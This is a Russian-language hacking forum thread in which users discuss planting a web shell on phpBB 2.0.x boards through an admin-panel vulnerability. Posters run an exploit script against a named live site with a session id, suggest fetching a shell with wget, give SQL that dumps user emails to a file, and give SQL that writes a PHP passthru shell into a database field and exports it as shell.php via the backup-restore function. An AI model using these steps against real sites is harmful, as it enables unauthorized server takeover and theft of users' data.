|
phpBB. Как залить шелл через уязвимость в admin_styles?
Как залить шелл? есть админка, есть r57phpbb_admin.pl
юзаю его... пытаюсь сдлеать wget не пашет... как правельно юзать wget? может я чтото неправельно написал? З.Ы. стоит Linux |
wget -o серверный_путь путь_к_твоему_шеллу.
В следующий раз попробуй найти это через поиск. зы. wget может вообще не быть. В общем всё это ещё раз описывалось в течении двух последних дней. |
чтото не кактит...
з.Ы. wget есть точно... юзал так Код:
V:\Kxe\exploit>admin.pl -p http://pvp-alfa.ru/phpBB2/admin/ -s 772dfdcc06191a8f3Код:
V:\Kxe\exploit>admin.pl -p http://pvp-alfa.ru/phpBB2/admin/ -s 772dfdcc06191a8f3 |
Цитата:
Azazel правильно сказал ! |
Через БД
|
Цитата:
а если как на этом форуме http://пожалуста.безссылок.ru Там пользователей и тем валом у них база 1GB весит не бось.... Так что это не вариант..... |
Там помойму стоит 2.0.16
|
SELECT email FROM users INTO OUTFILE 'c:/text.txt'
это для мейлов, дла хешей немного другая команда в БД |
сливать базу не обязательно можно и подругому - так создать файл с содержанием:
UPDATE phpbb_categories SET cat_title='<? passthru("$cmd"); ?>'WHERE cat_id=1; SELECT cat_title INTO OUTFILE '/home/bla_bla_bla/shell.php' FROM phpbb_categories where cat_id=1; потом просто выбираешь в админке восстановить базу и указываешь путь к этому файу. это создаст шел не испортив основную базу. |
там стоит 2.0.17
|
| Время: 00:06 |